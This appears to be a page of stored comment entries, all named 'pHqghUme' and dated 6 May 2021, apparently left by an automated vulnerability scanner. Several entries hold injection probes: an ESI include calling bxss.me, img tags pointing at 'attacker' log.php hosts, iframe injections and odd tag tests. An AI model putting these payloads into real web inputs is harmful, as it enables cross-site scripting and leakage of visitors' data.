 • pHqghUme

  2021-05-06 09:06:43


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 09:06:42


  1


 • pHqghUme

  2021-05-06 09:06:41


  1


 • 1M7i9hQAO

  2021-05-06 09:06:41


  1


 • pHqghUme

  2021-05-06 09:06:40


  1


 • pHqghUme

  2021-05-06 09:06:40


  1


 • pHqghUme

  2021-05-06 09:06:40


  1


 • pHqghUme

  2021-05-06 09:06:39


  1


 • pHqghUme

  2021-05-06 09:06:38


  1


 • WjNYd1VockE=

  2021-05-06 09:06:37


  1


 • pHqghUme

  2021-05-06 09:06:37


  1


 • pHqghUme

  2021-05-06 09:06:37


  1


 • pHqghUme

  2021-05-06 09:06:37


  1


 • pHqghUme

  2021-05-06 09:06:37


  1


 • pHqghUme

  2021-05-06 09:06:37


  1


 • pHqghUme

  2021-05-06 09:06:36


  1


 • pHqghUme

  2021-05-06 09:06:36


  1


 • pHqghUme

  2021-05-06 09:06:34


  1


 • pHqghUme

  2021-05-06 09:06:27


  1


 • pHqghUme

  2021-05-06 09:06:22


  1


 • pHqghUme

  2021-05-06 02:47:09


  1<baquwg<


 • pHqghUme

  2021-05-06 02:46:38


  1<img sRc='http://attacker-9671/log.php?


 • pHqghUme<An9IuL<

  2021-05-06 02:46:30


  1


 • pHqghUme

  2021-05-06 02:46:21


  1<4Bt3EP x=9318>


 • pHqghUme

  2021-05-06 02:46:04


  1<ifRAme sRc=9688.com></IfRamE>


 • pHqghUme<img sRc='http://attacker-9330/log.php?

  2021-05-06 02:46:03


  1


 • pHqghUme<KoCTHn x=9155>

  2021-05-06 02:45:46


  1


 • pHqghUme

  2021-05-06 02:45:33


  1<WPRVIR>MXQXG[!+!]</WPRVIR>


 • pHqghUme<ifRAme sRc=9018.com></IfRamE>

  2021-05-06 02:45:14


  1